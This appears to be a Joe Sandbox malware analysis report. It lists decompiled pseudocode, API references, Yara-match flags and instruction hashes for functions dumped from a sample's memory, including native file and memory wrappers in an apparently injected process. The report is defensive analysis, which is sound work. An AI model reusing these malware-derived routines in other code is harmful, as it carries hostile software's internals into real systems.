							_t124 =  *((intOrPtr*)(0x9cf230 + _t133 * 4));
							_t81 =  *(_t124 + _t119 + 4);
							__eflags = _t81 & 0x00000040;
							if((_t81 & 0x00000040) != 0) {
								 *_t143 =  *_t138;
								_t143 = _t143 + 1;
								__eflags = _t143;
							} else {
								 *(_t124 + _t119 + 4) = _t81 | 0x00000002;
							}
						} else {
							__eflags = _t80 - _t123;
							if(_t80 == _t123) {
								__eflags = _t138 -  *((intOrPtr*)(_t148 - 0x1c)) - 1;
								if(_t138 >=  *((intOrPtr*)(_t148 - 0x1c)) - 1) {
									_push(0);
									_t138 = _t138 + 1;
									__eflags = _t138;
									_push(_t148 - 0x14);
									_push(1);
									goto L13;
								} else {
									_t3 = _t138 + 1; // 0x9b2b48
									_t110 = _t3;
									__eflags =  *_t110 - 0xa;
									if( *_t110 != 0xa) {
										 *_t143 = _t123;
										_t138 = _t110;
										_t143 = _t143 + 1;
									} else {
										_t111 = 0xa;
										_t138 = _t138 + 2;
										 *_t143 = _t111;
										L29:
										_t143 = _t143 + 1;
									}
								}
							} else {
								 *_t143 = _t80;
								_t143 = _t143 + 1;
								_t138 = _t138 + 1;
							}
							continue;
						}
						L34:
						_t83 =  *(_t148 - 0x10);
						_t140 = _t143 - _t83;
						if( *((char*)(_t148 + 0x13)) != 1 || _t140 == 0) {
							L58:
							_t120 =  *(_t148 - 0x18);
							0x74a7428b();
						} else {
							_t145 = _t143 - 1;
							_t86 =  *_t145;
							if(_t86 < 0) {
								_t87 = _t86 & 0x000000ff;
								_t136 = 1;
								__eflags =  *((char*)(_t87 + 0x9ce408));
								if( *((char*)(_t87 + 0x9ce408)) == 0) {
									_t122 =  *(_t148 - 0x10);
									while(1) {
										__eflags = _t136 - 4;
										if(_t136 > 4) {
											break;
										}
										__eflags = _t145 - _t122;
										if(_t145 >= _t122) {
											_t145 = _t145 - 1;
											_t136 = _t136 + 1;
											_t106 =  *_t145 & 0x000000ff;
											__eflags =  *((char*)(_t106 + 0x9ce408));
											if( *((char*)(_t106 + 0x9ce408)) == 0) {
												continue;
											}
										}
										break;
									}
									_t119 =  *(_t148 - 0x24);
								}
								_t89 =  *((char*)(( *_t145 & 0x000000ff) + 0x9ce408));
								__eflags = _t89;
								if(_t89 != 0) {
									__eflags = _t89 + 1 - _t136;
									if(_t89 + 1 != _t136) {
										_t126 =  *((intOrPtr*)(0x9cf230 +  *(_t148 - 0xc) * 4));
										__eflags =  *(_t126 + _t119 + 4) & 0x00000048;
										if(__eflags == 0) {
											asm("cdq");
											E009B3F56(_t126, __eflags,  *((intOrPtr*)(_t148 + 8)),  ~_t136,  ~_t136, 1);
										} else {
											_t147 =  &(_t145[1]);
											 *((char*)(_t126 + _t119 + 5)) =  *_t145;
											_t102 =  *(_t148 - 0xc);
											__eflags = _t136 - 2;
											if(_t136 >= 2) {
												_t104 =  *_t147;
												_t147 = _t147 + 1;
												__eflags = _t147;
												 *((char*)( *((intOrPtr*)(0x9cf230 + _t102 * 4)) + _t119 + 0x25)) = _t104;
												_t102 =  *(_t148 - 0xc);
											}
											__eflags = _t136 - 3;
											if(_t136 == 3) {
												_t103 =  *_t147;
												_t147 = _t147 + 1;
												__eflags = _t147;
												 *((char*)( *((intOrPtr*)(0x9cf230 + _t102 * 4)) + _t119 + 0x26)) = _t103;
											}
											_t145 = _t147 - _t136;
										}
									} else {
										_t145 =  &(_t145[_t136]);
									}
									goto L55;
								} else {
									 *((intOrPtr*)(E009AF100())) = 0x2a;
									goto L3;
								}
							} else {
								_t145 =  &(_t145[1]);
								L55:
								_t142 =  *(_t148 - 0x10);
								_t146 = _t145 - _t142;
								_t140 = MultiByteToWideChar(0xfde9, 0, _t142, _t146,  *(_t148 + 0xc),  *(_t148 - 0x28) >> 1);
								if(_t140 == 0) {
									_t97 = GetLastError();
									E009AF0DF(_t97);
									L3:
									_t120 = _t119 | 0xffffffff;
									__eflags = _t120;
									_t83 =  *(_t148 - 0x10);
								} else {
									_t163 = _t140 - _t146;
									_t140 = _t140 + _t140;
									 *( *((intOrPtr*)(0x9cf230 +  *(_t148 - 0xc) * 4)) + _t119 + 0x30) = 0 | _t163 != 0x00000000;
									_t83 =  *(_t148 - 0x10);
									goto L58;
								}
							}
						}
						L60:
						if(_t83 !=  *(_t148 + 0xc)) {
							E009B2248(_t83);
						}
						if(_t120 != 0xfffffffe) {
							_t140 = _t120;
						}
						_t84 = _t140;
						return _t84;
					}
					goto L34;
					L15:
					if( *((intOrPtr*)(_t148 - 0x14)) == 0) {
						goto L30;
					} else {
						_t133 =  *(_t148 - 0xc);
						if(( *( *((intOrPtr*)(0x9cf230 + _t133 * 4)) + _t119 + 4) & 0x00000048) == 0) {
							__eflags = _t143 -  *(_t148 - 0x10);
							if(__eflags != 0) {
								L27:
								E009B3F56(_t123, __eflags,  *((intOrPtr*)(_t148 + 8)), 0xffffffff, 0xffffffff, 1);
								_t133 =  *(_t148 - 0xc);
								_t150 = _t150 + 0x10;
								_t114 = 0xa;
								__eflags =  *((intOrPtr*)(_t148 - 1)) - _t114;
								if( *((intOrPtr*)(_t148 - 1)) == _t114) {
									goto L23;
								} else {
									_t123 = 0xd;
									 *_t143 = _t123;
									goto L29;
								}
								goto L60;
							} else {
								_t115 = 0xa;
								__eflags =  *((intOrPtr*)(_t148 - 1)) - _t115;
								if(__eflags != 0) {
									goto L27;
								} else {
									 *_t143 = _t115;
									_t143 = _t143 + 1;
									__eflags = _t143;
									L23:
									_push(0xd);
									goto L24;
								}
							}
						} else {
							_t116 = 0xa;
							_push(0xd);
							if( *((intOrPtr*)(_t148 - 1)) != _t116) {
								 *_t143 = 0xd;
								_t143 = _t143 + 1;
								 *((char*)( *((intOrPtr*)(0x9cf230 + _t133 * 4)) + _t119 + 5)) =  *((intOrPtr*)(_t148 - 1));
							} else {
								 *_t143 = _t116;
								_t143 = _t143 + 1;
							}
							L24:
							_pop(_t123);
						}
					}
					goto L25;
				}
			}






































                                                          0x009a6233
                                                          0x009a6233
                                                          0x009a6233
                                                          0x009a6233
                                                          0x009a6233
                                                          0x009afb6d
                                                          0x009afb6d
                                                          0x009afb6d
                                                          0x009afb77
                                                          0x009afb78
                                                          0x009afb84
                                                          0x00000000
                                                          0x00000000
                                                          0x009afc0c
                                                          0x009afc0c
                                                          0x009afc11
                                                          0x009afc12
                                                          0x009afc14
                                                          0x00000000
                                                          0x009afbdd
                                                          0x009afb2a
                                                          0x009afb2c
                                                          0x009afb2e
                                                          0x009afc17
                                                          0x009afc1e
                                                          0x009afc22
                                                          0x009afc24
                                                          0x009afc30
                                                          0x009afc32
                                                          0x009afc32
                                                          0x009afc26
                                                          0x009afc28
                                                          0x009afc28
                                                          0x009afb34
                                                          0x009afb34
                                                          0x009afb36
                                                          0x009afb45
                                                          0x009afb47
                                                          0x009afb65
                                                          0x009afb6a
                                                          0x009afb6a
                                                          0x009afb6b
                                                          0x009afb6c
                                                          0x00000000
                                                          0x009afb49
                                                          0x009afb49
                                                          0x009afb49
                                                          0x009afb4c
                                                          0x009afb4f
                                                          0x009afb5e
                                                          0x009afb60
                                                          0x009afb62
                                                          0x009afb51
                                                          0x009afb53
                                                          0x009afb54
                                                          0x009afb57
                                                          0x009afc09
                                                          0x009afc09
                                                          0x009afc09
                                                          0x009afb4f
                                                          0x009afb38
                                                          0x009afb38
                                                          0x009afb3a
                                                          0x009afb3b
                                                          0x009afb3b
                                                          0x00000000
                                                          0x009afb36
                                                          0x009afc33
                                                          0x009afc33
                                                          0x009afc38
                                                          0x009afc3e
                                                          0x009afd49
                                                          0x009afd49
                                                          0x009afd4b
                                                          0x009afc4c
                                                          0x009afc4c
                                                          0x009afc4d
                                                          0x009afc51
                                                          0x009afc59
                                                          0x009afc5e
                                                          0x009afc5f
                                                          0x009afc66
                                                          0x009afc68
                                                          0x009afc6b
                                                          0x009afc6b
                                                          0x009afc6e
                                                          0x00000000
                                                          0x00000000
                                                          0x009afc70
                                                          0x009afc72
                                                          0x009afc74
                                                          0x009afc75
                                                          0x009afc76
                                                          0x009afc79
                                                          0x009afc80
                                                          0x00000000
                                                          0x00000000
                                                          0x009afc80
                                                          0x00000000
                                                          0x009afc72
                                                          0x009afc82
                                                          0x009afc82
                                                          0x009afc88
                                                          0x009afc8f
                                                          0x009afc91
                                                          0x009afca4
                                                          0x009afca6
                                                          0x009afcaf
                                                          0x009afcb6
                                                          0x009afcbb
                                                          0x009afcfa
                                                          0x009afd00
                                                          0x009afcbd
                                                          0x009afcbf
                                                          0x009afcc0
                                                          0x009afcc4
                                                          0x009afcc7
                                                          0x009afcca
                                                          0x009afcd3
                                                          0x009afcd5
                                                          0x009afcd5
                                                          0x009afcd6
                                                          0x009afcda
                                                          0x009afcda
                                                          0x009afcdd
                                                          0x009afce0
                                                          0x009afce9
                                                          0x009afceb
                                                          0x009afceb
                                                          0x009afcec
                                                          0x009afcec
                                                          0x009afcf0
                                                          0x009afcf0
                                                          0x009afca8
                                                          0x009afca8
                                                          0x009afca8
                                                          0x00000000
                                                          0x009afc93
                                                          0x009afc98
                                                          0x00000000
                                                          0x009afc98
                                                          0x009afc53
                                                          0x009afc53
                                                          0x009afd08
                                                          0x009afd0b
                                                          0x009afd0e
                                                          0x009afd25
                                                          0x009afd29
                                                          0x009afa7c
                                                          0x009afa83
                                                          0x009afa89
                                                          0x009afa89
                                                          0x009afa89
                                                          0x009afa8c
                                                          0x009afd2f
                                                          0x009afd34
                                                          0x009afd39
                                                          0x009afd42
                                                          0x009afd46
                                                          0x00000000
                                                          0x009afd46
                                                          0x009afd29
                                                          0x009afc51
                                                          0x009afd4c
                                                          0x009afd4f
                                                          0x009afd52
                                                          0x009afd57
                                                          0x009afd5b
                                                          0x009afd5d
                                                          0x009afd5d
                                                          0x009afd5f
                                                          0x009affda
                                                          0x009affda
                                                          0x00000000
                                                          0x009afb90
                                                          0x009afb94
                                                          0x00000000
                                                          0x009afb96
                                                          0x009afb96
                                                          0x009afba5
                                                          0x009afbca
                                                          0x009afbcd
                                                          0x009afbe8
                                                          0x009afbf1
                                                          0x009afbf6
                                                          0x009afbf9
                                                          0x009afbfe
                                                          0x009afbff
                                                          0x009afc02
                                                          0x00000000
                                                          0x009afc04
                                                          0x009afc06
                                                          0x009afc07
                                                          0x00000000
                                                          0x009afc07
                                                          0x00000000
                                                          0x009afbcf
                                                          0x009afbd1
                                                          0x009afbd2
                                                          0x009afbd5
                                                          0x00000000
                                                          0x009afbd7
                                                          0x009afbd7
                                                          0x009afbd9
                                                          0x009afbd9
                                                          0x009afbda
                                                          0x009afbda
                                                          0x00000000
                                                          0x009afbda
                                                          0x009afbd5
                                                          0x009afba7
                                                          0x009afba9
                                                          0x009afbaa
                                                          0x009afbaf
                                                          0x009afbb6
                                                          0x009afbb9
                                                          0x009afbc4
                                                          0x009afbb1
                                                          0x009afbb1
                                                          0x009afbb3
                                                          0x009afbb3
                                                          0x009afbdc
                                                          0x009afbdc
                                                          0x009afbdc
                                                          0x009afba5
                                                          0x00000000
                                                          0x009afb94

                                                          APIs
                                                          • ReadFile.KERNEL32(?,?,00000001,?,00000000), ref: 009AFB7C
                                                          • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,?,?,?,?,009B2B47,?,00000080,00000003), ref: 009AFB86
                                                          • __lseeki64_nolock.LIBCMT ref: 009AFBF1
                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,009B2B47,009B2B46,?,?,?,?,?,?,?,?,00000001,00000000), ref: 009AFD1F
                                                          • _free.LIBCMT ref: 009AFD52
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ByteCharErrorFileLastMultiReadWide__lseeki64_nolock_free
                                                          • String ID:
                                                          • API String ID: 1844164652-0
                                                          • Opcode ID: 167563a59dbc7d756b962afadd364715225c2f6188a19923c487cd5d41a89af2
                                                          • Instruction ID: e83d34a6351770bb20fcbe2a14f7493020441cfe0f9b0acd19aea8c2788bf9b3
                                                          • Opcode Fuzzy Hash: 167563a59dbc7d756b962afadd364715225c2f6188a19923c487cd5d41a89af2
                                                          • Instruction Fuzzy Hash: 6F210B35A042059FDB11CFECD864BADB7B9EF46720F244479EC95DB291C73498458BE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009C2241 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E009C2241(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E009C27B0(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E009C22E5(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E009C2A64(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E009C2985(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                                                          0x009c2244
                                                          0x009c224a
                                                          0x009c22bd
                                                          0x00000000
                                                          0x009c2251
                                                          0x009c2251
                                                          0x009c2254
                                                          0x009c226f
                                                          0x009c2272
                                                          0x009c2292
                                                          0x009c22a4
                                                          0x009c2274
                                                          0x009c2274
                                                          0x009c2277
                                                          0x00000000
                                                          0x009c2279
                                                          0x009c228b
                                                          0x009c228b
                                                          0x009c2277
                                                          0x009c22c2
                                                          0x009c22c6
                                                          0x009c2256
                                                          0x009c226e
                                                          0x009c226e
                                                          0x009c2254

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                          • String ID:
                                                          • API String ID: 3016257755-0
                                                          • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                          • Instruction ID: 17e066fa11468b813839086f4db12a5240bf5f19a64551474df990d6bf1a586b
                                                          • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                          • Instruction Fuzzy Hash: 5E01403280014ABBCF165F84DC41EEE3F26BF29354F588519FE2858035D736C9B1AB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          Function 000AA34A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 295 aa34a-aa3a1 call aaf50 NtCreateFile
                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,000A4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000A4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 000AA39D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: .z`
                                                          • API String ID: 823142352-1441809116
                                                          • Opcode ID: c0e56e0d9cc9a6916effb2bdfe839b2cd039b9d22b91e97cf9b0dc550c7ab15c
                                                          • Instruction ID: e870a0d329ca03155c4363f3f6b66a4fa27199b89f6cce099237069e8379dfe5
                                                          • Opcode Fuzzy Hash: c0e56e0d9cc9a6916effb2bdfe839b2cd039b9d22b91e97cf9b0dc550c7ab15c
                                                          • Instruction Fuzzy Hash: 0A01B2B2200109AFCB58CF99DC85EEB77A9AF8D754F15824CFA5D97291C630E811CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000AA350 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 298 aa350-aa366 299 aa36c-aa3a1 NtCreateFile 298->299 300 aa367 call aaf50 298->300 300->299
                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,000A4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000A4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 000AA39D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: .z`
                                                          • API String ID: 823142352-1441809116
                                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                          • Instruction ID: 47d22afac6c8386adbdb7d2fe089b92fe384463677c00205d09c8920dd04da9a
                                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                          • Instruction Fuzzy Hash: F4F0BDB2200208AFCB48CF88DC85EEB77ADAF8C754F158248BA1D97241C630E811CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000AA3FB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38filenativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 301 aa3fb-aa449 call aaf50 NtReadFile
                                                          APIs
                                                          • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!J,FFFFFFFF,?,bM,?,00000000), ref: 000AA445
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: !J
                                                          • API String ID: 2738559852-747486036
                                                          • Opcode ID: 681378be82cb75fca8b1af601ef411f883547eab9a2786295c328b7fc403c216
                                                          • Instruction ID: 258df40ec44b9799fc1f704493aed65e979cc41aba06219bfc6837af385516cf
                                                          • Opcode Fuzzy Hash: 681378be82cb75fca8b1af601ef411f883547eab9a2786295c328b7fc403c216
                                                          • Instruction Fuzzy Hash: 71F0E7B6200208AFCB14DF89CC91EEB77A9AF8D714F158258FA1D97241D630E811CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000AA400 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 304 aa400-aa416 305 aa41c-aa449 NtReadFile 304->305 306 aa417 call aaf50 304->306 306->305
                                                          APIs
                                                          • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!J,FFFFFFFF,?,bM,?,00000000), ref: 000AA445
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: !J
                                                          • API String ID: 2738559852-747486036
                                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                          • Instruction ID: ea0736737f91792071ebeb698e733047b394ffabb82d9b091c02cbb2f7691619
                                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                          • Instruction Fuzzy Hash: 56F0B7B2200208AFCB18DF89DC81EEB77ADEF8C754F158258BE1D97241D630E811CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000AA47B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 310 aa47b-aa4a9 call aaf50 NtClose
                                                          APIs
                                                          • NtClose.NTDLL(@M,?,?,000A4D40,00000000,FFFFFFFF), ref: 000AA4A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID: @M
                                                          • API String ID: 3535843008-718900356
                                                          • Opcode ID: ebc51a09435a68d2cc7833ce378eed4e2059f018e97a588cf6071ab07bbb4f1f
                                                          • Instruction ID: 05a30ab368933bdc7656f2c4bb3066a0c02362e531ded7fb35d9bb6cce12d198
                                                          • Opcode Fuzzy Hash: ebc51a09435a68d2cc7833ce378eed4e2059f018e97a588cf6071ab07bbb4f1f
                                                          • Instruction Fuzzy Hash: 5AE08C75600200AFD720DFE9CC86EEB7B68EF85364F1041A9BA1DEB282C630A500C6A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000AA480 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 319 aa480-aa496 320 aa49c-aa4a9 NtClose 319->320 321 aa497 call aaf50 319->321 321->320
                                                          APIs
                                                          • NtClose.NTDLL(@M,?,?,000A4D40,00000000,FFFFFFFF), ref: 000AA4A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID: @M
                                                          • API String ID: 3535843008-718900356
                                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                          • Instruction ID: d407a012ec43a561f709d0a4e24f1a77566909f608e5d01d4c891e5cc4d79cc1
                                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                          • Instruction Fuzzy Hash: 93D01776600214AFD714EBD8CC85EE77BACEF49760F1544A9BA1C9B282C630FA0086E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000AA530 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00092D11,00002000,00003000,00000004), ref: 000AA569
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                          • Instruction ID: 99c5722ceb25330ff66acbf4786c1a9a39221e89e92c316f095899b835b15410
                                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                          • Instruction Fuzzy Hash: 07F015B2200208AFCB18DF89CC81EEB77ADAF88754F118158BE1C97241C630F810CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01F600C4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                          • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                          • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                          • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01F607AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                          • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                          • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                          • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01F5F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmpDownload File
